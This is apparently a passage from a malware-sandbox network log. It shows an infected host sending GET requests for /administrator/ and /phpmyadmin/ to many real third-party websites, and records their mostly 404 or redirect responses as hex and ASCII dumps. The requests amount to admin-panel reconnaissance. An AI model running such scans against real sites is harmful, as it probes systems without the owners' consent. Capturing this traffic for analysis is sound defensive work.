77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:11 UTC	8177	IN	Data Raw: 30 30 25 32 43 37 30 30 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e Data Ascii: 00%2C700i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.6	57796	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	181	OUT	GET /administrator/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	411	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.cabinet-orsika.fr/administrator/ X-Cache-Status: MISS X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.6	57792	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	174	OUT	GET /administrator/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:10 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.6	57812	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	173	OUT	GET /administrator/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Set-Cookie: PHPSESSID=i3lvqgq0ufurmkbj7l8g7oodcfvqs85s; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:11 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:11 UTC	464	IN	Data Raw: 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 Data Ascii: ullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:curr
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:11 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 65 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 Data Ascii: 2000ter{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em
2024-02-20 23:26:11 UTC	6	IN	Data Raw: 3b 7d 2e 68 61 73 Data Ascii: ;}.has
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:11 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d Data Ascii: 2000-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--
2024-02-20 23:26:11 UTC	6	IN	Data Raw: 64 2d 63 6f 6c 6f Data Ascii: d-colo
2024-02-20 23:26:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:11 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 Data Ascii: 2000r:var( --e-global-color-accent );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondar

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	57846	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	180	OUT	GET /administrator/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	229	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/administrator/
2024-02-20 23:26:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.6	57692	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	358	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.cabinet-orsika.fr/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:11 UTC	16026	IN	Data Raw: 31 64 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 Data Ascii: 1d1b<!DOCTYPE html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... T
2024-02-20 23:26:12 UTC	16384	IN	Data Raw: 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 37 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 3e 20 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 7d 68 31 2e 77 69 64 67 65 74 2d 74 69 74 6c Data Ascii: .is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link.wp-element-button:not(.has-background){background-color:var(--ast-global-color-7);}.entry-content[ast-blocks-layout] > figure{margin-bottom:1em;}h1.widget-titl
2024-02-20 23:26:12 UTC	16384	IN	Data Raw: 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 66 75 6c 6c 2c 2e 61 73 74 2d 70 6c 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 2c 2e 61 73 74 2d 70 61 67 65 2d 62 75 69 6c 64 65 72 2d 74 65 6d 70 6c 61 74 65 2e 61 73 74 2d 6e 6f 2d 73 69 64 65 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 20 2e 61 6c 69 67 6e 77 69 64 65 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 Data Ascii: t-no-sidebar .entry-content .wp-block-column .alignfull,.ast-plain-container.ast-no-sidebar .entry-content .wp-block-column .alignwide,.ast-page-builder-template.ast-no-sidebar .entry-content .wp-block-column .alignwide {margin-left: auto;margin-right: au

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.6	58062	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	177	OUT	GET /administrator/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_L4ckEcEjmS2yr2vyJDOHbZ0VTDk048znR28BGssAlNlW4/mpti8VN7HtirCmvP/GtLFdOtTVIL8X35yoq8nfVg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.6	58045	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	217	OUT	GET /administrator/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:10 GMT Connection: close
2024-02-20 23:26:10 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.6	58128	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	253	OUT	GET /administrator/index.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/administrator/
2024-02-20 23:26:10 UTC	756	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close location: https://fortressrealcapital.com/administrator/ expires: Wed, 21 Feb 2024 00:26:10 GMT Cache-Control: max-age=3600 x-redirect-by: WordPress CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WaOr5wUb%2BToibXaTFk5MdXMU%2Frwg0KQJPzkS46lBOtqrsqweQLNnqzMsFR9S%2FNF7U9Rcr3Tzf3ZMzhYTOLO6bVnzX5Ex2DQU0xbbOJdhznApYeUJovZXosRiQzl9MiOm47HF30pu1dxMAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a83549c2c4231-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.6	58260	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:10 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.6	58327	85.214.145.11	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:11 UTC	448	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/" Server-Timing: wp-before-template;dur=311.48, wp-before-template-db-queries;dur=8.86
2024-02-20 23:26:11 UTC	15936	IN	Data Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 Data Ascii: 